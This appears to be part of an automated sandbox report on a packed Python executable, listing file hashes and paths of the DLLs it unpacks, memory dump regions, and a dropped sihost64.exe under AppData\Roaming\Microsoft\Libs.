| MD5 | 6a32b4a457bc7eb515ed59dba1114897 |
| SHA1 | 7a69af1660d76285183754c7d1b29d81968d3960 |
| SHA256 | da3fcc1283339ddd4504e48a63f75e4f8ac8f30ce48384e7c643b80b372bfcd6 |
| SHA512 | 7c5968f24940e35eae221f6b17b44aef51f751d685d74e79aa247d5dfd95d8a8d3da3f7ce95a2c15764c5005be05fec22ec7a7c61617444acea353bf7931d19a |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-crt-filesystem-l1-1-0.dll
| MD5 | ef655e2df6aa03c6aa11679e1601cbd1 |
| SHA1 | 435082a01784be95f473095e4f0499f5c8c1e6b1 |
| SHA256 | 8ec445f97325160b291ca8046c1cba997067e42e4095f724bda9b43ae13bfed7 |
| SHA512 | 3a1ef8c4bfe553de57d59dc2c2009e65e69a8dca914d8d2396495b888be0859e78508e4000a39a482c7116fadfe1b8d143b9aaa2c97785a0954afd8b8b81a23f |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-crt-environment-l1-1-0.dll
| MD5 | 61d0f3d97c1a7af5314c39c80c838796 |
| SHA1 | 06f7971574f67f34f61ff1a9a54b60221070d04b |
| SHA256 | 0bfca5c3f717d1373e3faf94dd3d010a6976ae2d57cb35a197c5bbac80724b10 |
| SHA512 | 9651f768c448fbb878b7600cbd80c001b7d7ea7dbec04b4ec50a637939787591a484aafd7ea5c2e0c77447229970b3bf1b6175e552a9f2a1024272895ed04a75 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-crt-convert-l1-1-0.dll
| MD5 | e813f085bb974077fd1ff02f859c19ff |
| SHA1 | bdca1e7ca980373cfe93e2c07eae4e5f14fa92f8 |
| SHA256 | 9818a2278ce39e0ecffa9bd2502fed106f9f2c6acaf801fb7d7df80606abc2ab |
| SHA512 | b3b4b0e749dd04e698a26a82e2daa21e91d50896a648310253d69feb33585fd91e9c54698e33e8b9843642c865123e60a1cfaf3f2af46827afd38cd87a1b3e85 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-crt-conio-l1-1-0.dll
| MD5 | 0b61c5aaf5794c40643856d3f84fd107 |
| SHA1 | 88cd05a9d2c4ad3f928793e3d5479cf84eea088a |
| SHA256 | 8eb4ad287946765485ae35ca7fabb29844293412b01678d7c29d53688db80499 |
| SHA512 | 78b22375796848e78f39495619dfb5a91da28f95b0a931effa7971265ed95663894ec55a8c2b249a326d9605d053c7c0abdd65f7d9a271fc803ac2fe2695411a |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-util-l1-1-0.dll
| MD5 | ded095a3ea12e19e8fa06b400f4da71c |
| SHA1 | c0537be41395dc58c2050527a1302bcca385c819 |
| SHA256 | fcbc8a6d4fcfda1df56188c7415874ac6e163aa5669da8b4dc5817411c7499b0 |
| SHA512 | 5e27db0972db7ec821db1000d7293bbad4c9253aeaec37114be767625f32102bdc98476b0e819c2598dbe9f67e54cdb6d67a2046971467febba93e447f62b338 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | 9ec9658795a82a6f689dbbf9b14d56a8 |
| SHA1 | 90498e0259ec68959e0ca9b7dfb6e94f24a192e5 |
| SHA256 | e25a1056beef787a1857541714d3ced677bc29257ddb70643a3f332d7081e24b |
| SHA512 | ddab3d638f6b685ecf438870b3b6f1d7dd56319ed4748cbca20d54863970ce1e4e5edac4b7df5b63712fa63b1214f9477360f6f1dc7ec28feb807d3a3eb6457a |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-sysinfo-l1-1-0.dll
| MD5 | 6c97c8a4e1231863a6f2638bf44fbe53 |
| SHA1 | 265e0b59a4ff5b7011d477f9172925b008be728c |
| SHA256 | dad6738302efa9875f8c929c6c375cf15942a2cd6205b42166cde543f59697fd |
| SHA512 | f957695f43212057905e4898c8d77bf82219bd33de3877d337625f5064b794f1dd6d507a7ab167d6b73e6531f9e839bc4148e0c433b396abeb827167448a6f1f |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-synch-l1-2-0.dll
| MD5 | c959ff1b1b733abd45125d6392a4f0fc |
| SHA1 | 3ce203f1e864e313ae0025acf776429a7d440150 |
| SHA256 | 0c764d9856bbedd7ea95e3427790fdb0c3c270c1a97fa3e0d085d77bd684537d |
| SHA512 | b71f6a4130ebb122506ecbd86ea5ddb73ab5bd6c6bac0caab9fff2e908b998a0cf8e45a95af14060186e114701141980192ad506a1365eaaa8364f6e649d0e88 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-synch-l1-1-0.dll
| MD5 | 0bd7734587b455b3b0fe4ff1342d38a5 |
| SHA1 | dbafbba73d821a395c97281741ed8ecbdfd9711d |
| SHA256 | 3f554614aba0bf193d101495b88fb5e3e6abc8e8c1f45dcc8053265fbc6b0a8c |
| SHA512 | 24f58e431a3660d94d7b2180dcd218c787f2b7fce4285e933c5191a7397ded002459487552b360dce5b8e61f2b70184a9bbdc6f5afe2767e6876f49f31f14451 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-string-l1-1-0.dll
| MD5 | 8e1b04d0e6ff7a3fc381f7306d6cf243 |
| SHA1 | a0a2794da5bfd59e7a7db03dd21aba9f10613623 |
| SHA256 | b4c44d1ee830c37ae96b90b0a119b4e137862f45314454a23b81fd3a2399a635 |
| SHA512 | 1c45e2b37b9b648227b1af4d739e5d4f1979fa8796651a53d01d0a1cb871665115ded270b74e2abd9600a1c6157cfb0999c7958e69d188d9a420599d015bfb3d |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-rtlsupport-l1-1-0.dll
| MD5 | 93a2ea4844b8e80c1cff746c295553c7 |
| SHA1 | bd29d940b9c70ad7fd3b8645ca6d450c3392830a |
| SHA256 | a50682fdd5a5ae9ceb02c7b9caffdce10e3b38178ebe3e74b6323627fc6d3a89 |
| SHA512 | 0b95784543bf554d375c84721103f5a84aecc22d6d712df9713d6bd247258e5d6349a2ba9d92c7543d1303c91cfaf99d6d4f609b717db3bcd35f393a10d57d5e |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-profile-l1-1-0.dll
| MD5 | 93ad9b6d88b931d7c1672ae0af2d9dac |
| SHA1 | 8aa5583b42555a8706fd05b2211c1b6cd1c51c2b |
| SHA256 | 5ef9cd62cf2a2b0cb068126d9c680016c9e1f3b738a284325b9796c86af06594 |
| SHA512 | b04d553a719388347409047756db2ecbe58b2f4e08fa5bb4544725c1342c7e795267ab6493fca1a850eecaeb9c7a1779f874ce0367dcefa1ab1cb79b14cd7b45 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | 54d6888e154d8fd2b35c7a7b8dcaa84b |
| SHA1 | 883cca38ff0d43ab86b344ec7a490515f594a060 |
| SHA256 | 9e2744bc1f7fa7015881c5edc7f14b031472ca1a08c57c38325cbf7736890be0 |
| SHA512 | 0b2f048b2b5f1083d8e65ddb3278a4340eab05e41d9a08b4337f4cdf6b5afe540cda6c3b87462a2de3bb9ff2fc2ab6d95631913c6e1e02335a42812d7ef681dd |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-processthreads-l1-1-0.dll
| MD5 | b6ef15e2cff6a7de8db778da9e845c55 |
| SHA1 | 8062e8b2a02f9e0ad346bcc5ed8263fd61f17b4b |
| SHA256 | c1ed94eade0309c4c4f0854f5a972bf76d55393857e45c770e217a996103aa62 |
| SHA512 | 50a8267aab8819eac91e81bdcad64585b926dad0b41db46677b2214e68e3046bba0a9af33eb86c310e9bb2c8b4a04a12c6a70a772540072c7fc815a293a00c3e |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-processenvironment-l1-1-0.dll
| MD5 | 9dd8cc2363db5f39ea3b6fc28dbb5695 |
| SHA1 | 33c49373c772c0c7ec71983158213569cf572ee2 |
| SHA256 | 173bbf24f7420db3d1e53e45dd0179b9b152bc6d08f3d46eb9d47a833a46cb0a |
| SHA512 | 946d4acde2773332405e1c4c0bf427f0cbde4ee42e72acac7039a482a62dd99f033c526428f42b63a2aca5db1eea0e6b45063d1e2de044ee8201ab829d884523 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-namedpipe-l1-1-0.dll
| MD5 | bbee8d15501d1fe036fdac6c032c4380 |
| SHA1 | a8be3ab44d754498405ffabd39f77fc829bad3c6 |
| SHA256 | c26aae1fe2c56eb26ed1af5bb7cca7cea762e126f4c2e06b6ab39d75a8cb4482 |
| SHA512 | 9851d4bc159a5b21e281c591c001245ced0455adf2c419977490546cbf452d405a34152a2df645a344aa50f45c2caff383e43a75e062c3478aba713868fbe2d1 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-memory-l1-1-0.dll
| MD5 | 273fdaa82afae0337f7f04ff9936afa3 |
| SHA1 | dd0ef3117be0d59ee13051346708b3008b1149c6 |
| SHA256 | 9becf626ccabbcfc9a7b779026644606ec565b08cc9b85d3af09ab5189e8c6f9 |
| SHA512 | b19b2998bb197b741d878f0a25e75abea0f05033f20b17003bf8eed983ca35a90918fc4bb399d6c7150c8be8cb5a428e4f2fe804f1aae5a32f0a363604bc1fd7 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-localization-l1-2-0.dll
| MD5 | 7859eb82f99fa849ad33909cdae8d493 |
| SHA1 | b56512906e9642a99dcb7eb7373fa8ad5990019e |
| SHA256 | 7c7a3c0d04519d1656a50604b1052850e9d937b6c3e973d564a6b2f9495ae05f |
| SHA512 | a6548d6d70e8c22638d0619b4eaafead5289953c013d2e95477fb34316b788cd756217426dd36582b49ba5fd93702c4ec4590cabbe47d79156516fff5fcdb149 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-libraryloader-l1-1-0.dll
| MD5 | 650ecbe45be7506075f93351bb0389f5 |
| SHA1 | 4c33717c81500c72d4d7e9963b3c9043b8441a3f |
| SHA256 | 406e80902211d987ef0260d9db08821460e0702e90ae47165a727e0ca6b7c325 |
| SHA512 | 63696d75015f2ed5c04883111aeae7eb594ff9fbc83f9b9399ccfd8186b9a5c52e4656005ef2c540091f82f7687745a209da79d12aa944a1d12b64547c31f342 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-interlocked-l1-1-0.dll
| MD5 | cedb4d3397a2c134fec77753f880d025 |
| SHA1 | 173f8841d20ef214c197eb4bab0a0d1e0cb6bebd |
| SHA256 | 433b60ea4523c5733da468703d14ab8dcce42ef5f2417f9cde2fea3d3c3c977c |
| SHA512 | 6df040faa43172f14e65d1a2311d5ab66cee250e12596e901a2d7cd8144a3738e8e486545ad760a254ed278f4d35f68e1dcefaf77bf581858b2070768d1bc18d |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-heap-l1-1-0.dll
| MD5 | e58baf7e437354716be8bff0495f9bfe |
| SHA1 | e873e3d8d422f62cabe7040517e561e31862278c |
| SHA256 | 6dee9c5652e2858fbfdd50c5175127108d227b7e90f575b2e6c33f1c8f5a0976 |
| SHA512 | 2b7f122b48dbc7304118653e371ed99b45b203251a6dca2387311c4c70562121132bf2e00fa8d1b953583f2ca878602c2a1625f3bf3782112fd2619ba1ff25f8 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-handle-l1-1-0.dll
| MD5 | 71cdf92988835da9a691482a6f06174f |
| SHA1 | 16f12bb281540a0de6c95120fc51dd0a068e28dd |
| SHA256 | 797f05fb447cdba1078acb66cb7bde7c908f0efba0bc3fd4a54b4daebffaf84b |
| SHA512 | 1987fbf26559e59894de2289792577b857f320809ab1720e799933528a8d082240556f63d2f4c16907b45f6da10a7e04dac8bb953f036f0ebe822c7d13b1bb8c |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-file-l2-1-0.dll
| MD5 | 80ab22c6d0250257b61b217822aa5d7c |
| SHA1 | e659198c8045d918384e276783507d77ce297cd6 |
| SHA256 | d56b63aefedc21372a5d75918032e98f3e4c564733d4838a5b442351e32a300b |
| SHA512 | 94e61803a318fde919ba18a20cbdfae1250a844c2266311bc99cfcbb22757bd43b5279567f24bae32192dc0b9fbb0b20d10db3b3f19014708af7e8f89a1c96a4 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-file-l1-2-0.dll
| MD5 | 4e7b40f3c457212792ed796d5ceb7c0f |
| SHA1 | dedb78bbcc0ae5e5ab1cb15eec15e4f3300bc32e |
| SHA256 | 11f046a0bd6ea6bbae9355e7b3f6ca42adae2a5c7f41f30fcb497baec80d69ad |
| SHA512 | 3f8fd4171d48cf8f9a37fad1b42d79bb9b8cf8c08d0e594aebc6425c1b5d981db542a4a57bf71d5fd936641755c1c8548bc77ead99aff142da0da10e03b1c135 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-file-l1-1-0.dll
| MD5 | ca2c182a0d46f7f614cbb61d3e9555c5 |
| SHA1 | 04713c5ff488e17c151bfca1c540c495783c6e4a |
| SHA256 | 34b41b7160bf5fe3d46b95f51399de8666c5ab32b064e7d57d7771fd51aa0ce2 |
| SHA512 | 7b1a994b8681921d308e8ebb62f47e705807c4eaeb7b6b25517b633b4bb324865a0987d4f4f3e8c166973ad5c8d8dce8ec83aafe20de8194c0ad8a64565b703f |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-errorhandling-l1-1-0.dll
| MD5 | 4fc7b688f541c78df18402f7e3256929 |
| SHA1 | b431cecc0dd87ef4b4d3154b3ed6ff3b5c2eb0cd |
| SHA256 | 6e6c39c29890949d9857190c608ba8e4a195b8dc656d8616322e27a9d268fa49 |
| SHA512 | 3d082b60af05566b9bc0135dbc5b9a9ccd9ba0aac07522a63ef15739f83b5b43f0c432274b15c29e00d4cd18e85d6c1673f7bfd872f57319c7b490db3ed69fdb |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-debug-l1-1-0.dll
| MD5 | ae0f85a63ada456eeaf94b846fe8bd26 |
| SHA1 | 621625b9913b257eb8fa39aa0637adb6737394fe |
| SHA256 | 305ce445fa2e3bbd9aca3f1a31ca8c805daec293cc79bcd20b39ea5ae5b9989d |
| SHA512 | 059d8de197387c761f2ea0066892e47722fc56fd274e4eff181e1192223d0c6ba8230b4d5f656cfec426dbd715c0e0acbef91681c462b2be6928f56ea7aaa267 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-datetime-l1-1-0.dll
| MD5 | 50ccec6aa3033c421ec34a17625bdc08 |
| SHA1 | abce26f3702e8f3d833f2e35adc8bc42d95354d6 |
| SHA256 | 0d9125cc84892ef961f33f316139e027095e325d540a98d5cd8099633d31b368 |
| SHA512 | 633ca161419f6dd990750a6f674a7cc8436b43c1c5ee02699bb0935ee030434f76a773dfe8f1c9b01e15c507ba8f1de4768a1829c239a34bfedee2b5226fbaf2 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-core-console-l1-1-0.dll
| MD5 | 6746e9cbc897101fd8ca22e42490614f |
| SHA1 | 3d732b58411eb6f4ad624bc9c7c5243315466ed3 |
| SHA256 | 81310fd7aaf3a8a280e6efddecd5a682c871fc6f5595a3ba131c9e60b58c80e1 |
| SHA512 | 2d9e059c9f924030d119e42de65e7488dfb87459d732391c674448e63e3a10b75b0886e0eedfdcab86dbb14c987cf6d1a0d276a9bc7571fcb0cfd8ff0c9157d5 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\libffi-7.dll
| MD5 | 6f818913fafe8e4df7fedc46131f201f |
| SHA1 | bbb7ba3edbd4783f7f973d97b0b568cc69cadac5 |
| SHA256 | 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56 |
| SHA512 | 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\base_library.zip
| MD5 | 4c60bcc38288ed81c09957fc6b4cd7cd |
| SHA1 | e7f08d71e567ea73bb30656953837314c8d715a7 |
| SHA256 | 9d6f7b75918990ec9cd5820624130af309a2045119209bd90b4f70bc3abd3733 |
| SHA512 | 856d97b81a2cb53dcba0136afa0782e0f3f81bea46f98e0247582b2e28870b837be3c03e87562b918ec6bc76469eecc2c22599238d191d3fba467f7031a2acaa |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\ucrtbase.dll
| MD5 | 6914ef1fad4393589072e06a4630d255 |
| SHA1 | 028669a97db7c007441ae3330767968544eba3c6 |
| SHA256 | 81c9b5d54e1b1da192f4a167f7e06439e36c670a99af2f1ef056e0959e85de57 |
| SHA512 | b682c749d6f2ed56d69ff4f8520899638fa6f436b2af8241db686ccbc606d23d4e77721222ab7ad863336d5e5aafa1033b94f550198a1a083af5811ce8dec004 |
memory/1032-220-0x0000000073F40000-0x00000000746F0000-memory.dmp
memory/1308-225-0x00007FFB64210000-0x00007FFB64676000-memory.dmp
memory/1308-224-0x00007FFB62F70000-0x00007FFB63088000-memory.dmp
memory/1308-223-0x00007FFB7A610000-0x00007FFB7A61D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | cfe1ab1913bbd166bca480eb4e5d1364 |
| SHA1 | a1e87dd6018f244966d875054330640f6e2d9c00 |
| SHA256 | db41aa5958994bce76ea6b86083cbf634760a5b1ccdeec9c2387ec6bc33915f6 |
| SHA512 | 978a65def8eadc595d34752d54f76d8638bf133d09295e763f7b42a2bd342ed334fc0b1ae3680f0bff17f1899ecb42cf50e827dd4c91d4b16bdaadcdf41e3ae4 |